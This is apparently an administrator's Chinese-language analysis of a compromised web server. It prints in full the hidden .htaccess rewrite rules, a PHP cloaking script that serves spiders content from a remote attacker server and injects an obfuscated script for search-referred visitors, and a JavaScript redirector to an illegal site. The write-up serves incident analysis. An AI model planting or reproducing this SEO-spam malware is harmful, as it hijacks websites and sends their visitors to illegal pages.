1.在网站根目录找到一个隐藏的.htaccess文件。里面有URL 跳转的路径。此文件在win服务器中无法删除 无法 重命名。用attrib del Cacls命令都不行。
以下URL:都会跳转到 广告页面
/111safasf/index.html
/随机字符/index.html
/?zdsfasf=werwerw
.htaccess文件类容
Options +FollowSymLinks #访问到符号连接时,是否跳转到对应的连接路径
IndexIgnore */*
RewriteEngine on
RewriteRule ^(\w+)/index.html$ images/hot/页面.php?id=$1
RewriteRule ^xw(\w+)/$ images/hot/页面.php?id=$1
# if a directory or a file exists, use it directly
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
#RewriteCond %{REQUEST_FILENAME} !-f (如果不是文件,才会执行下一条RewriteRule)
#RewriteCond %{REQUEST_FILENAME} !-d (如果不是目录,才会执行下一条RewriteRule)
找到页面跳转的PHP 文件 代码如下
<?php
/*
* 判断是否是通过其它网页引用过来的
* **/
function isref()
{
$isref = false;
//得到链接到当前页面的前一页面的地址
if( !isset( $_SERVER['HTTP_REFERER'] ) ){
return $isref;
}
$referer = strtolower( $_SERVER['HTTP_REFERER'] );
$searray = array("baidu","so","sogou","soso","haosou","google");
foreach ($searray as $value) {
if(strpos($referer, $value) !== false){
$isref = true;
break;
}
}
return $isref;
}
/*
* 判断是否是搜索引擎的蜘蛛程序访问
* */
function isspider()
{
$isspider = false;
$http_user_agent = strtolower($_SERVER['HTTP_USER_AGENT']);
$searray = array('baidu','360Spider','sogou','soso','360','so','google');
foreach ($searray as $value) {
if(strpos($http_user_agent, $value) !== false){
$isspider = true;
break;
}
}
return $isspider;
}
function flushout($html)
{
//echo 1;
//var_dump($html);
ob_clean();
ob_start();
echo $html;
ob_flush();
ob_end_flush();
}
//获取远程的网页
function getWebContent( $api )
{
$c = '';
if (function_exists('fsockopen')) {
$link = parse_url($api);
$query = $link['path'] . '?' . $link['query'];
$host = strtolower($link['host']);
$port = isset($link['port'])?$link['port']:80;
$fp = fsockopen($host, $port, $errno, $errstr, 10);
if ($fp) {
$out = "GET /{$query} HTTP/1.0\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$inheader = 1;
$contents = "";
while (!feof($fp)) {
$line = fgets($fp, 4096);
if ($inheader == 0) {
$contents .= $line;
}
if ($inheader && ($line == "\n" || $line == "\r\n")) {
$inheader = 0;
}
}
fclose($fp);
$c = $contents;
}
}
if (empty($c) && function_exists('curl_init') && function_exists('curl_exec')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $api);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)");
$c = curl_exec($ch);
curl_close($ch);
}
if (empty($c) && ini_get('allow_url_fopen')) {
$c = @file_get_contents($api);
}
if(empty($c)){
header("HTTP/1.1 404 Not Found");
exit;
}
//header("Content-Type: text/html; charset=gbk");
return $c;
}
$isspider = isspider();
//$isspider = true;
if( $isspider ){
$host = $_SERVER['HTTP_HOST'];
$url = 'http://www.蜘蛛服务器地址.cn/44.php?host=' .$host . '&' . $_SERVER['QUERY_STRING'] ;
$html = getWebContent( $url );
//$html = iconv( 'gb2312' , 'utf-8' , $html );
//flushout($url);
flushout($html);
}
$isref = isref();
// $isref = true;
if( $isref ){
$html = "<scri"."pt lang"."uage='jav"."as"."cri"."pt' src='http://www.蜘蛛服务器地址.com/p1.js'></sc"."ript><br/>";
flushout($html);
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"/>
<title>404 - 找不到文件或目录。</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>服务器错误</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - 找不到文件或目录。</h2>
<h3>您要查找的资源可能已被删除,已更改名称或者暂时不可用。</h3>
</fieldset></div>
</div>
</body>
</html>
页面根据跳转过来的网址 get到他们的服务器 44.php 文件
http://www.蜘蛛服务器地址.cn/44.php?host=' .$host . '&' . $_SERVER['QUERY_STRING'] ;然后
随机生成一个新闻页面,然后被百度抓取。若客户通过百度搜索进入网址,打开就会跳转到相应的非法网址。
下面那个JS 文件也是跳转页面
JS 内容
if(typeof(js616_)=='undefined'){ var js616_ = 'loaded'; var js616dm = document.domain.toLowerCase(); if(js616dm.indexOf('qq.com')!=-1){ document.writeln('<script type="text/javascript" src="https://js.users.51.la/19555119.js"></script>'); document.writeln("<script language=javascript>setTimeout(\"window.location.href='http://www.非法网址.com/'\",\"1000\");</script>"); document.writeln("<script language=javascript>setTimeout(\"window.opener.navigate('http://www.非法网址.com/')\",\"1000\");</script>"); }else{ document.writeln('<script type="text/javascript" src="https://js.users.51.la/19555119.js"></script>'); document.writeln("<script language=javascript>setTimeout(\"window.location.href='http://www.非法网址.com/'\",\"1000\");</script>"); document.writeln("<script language=javascript>setTimeout(\"window.opener.navigate('http://www.非法网址.com/')\",\"1000\");</script>"); } }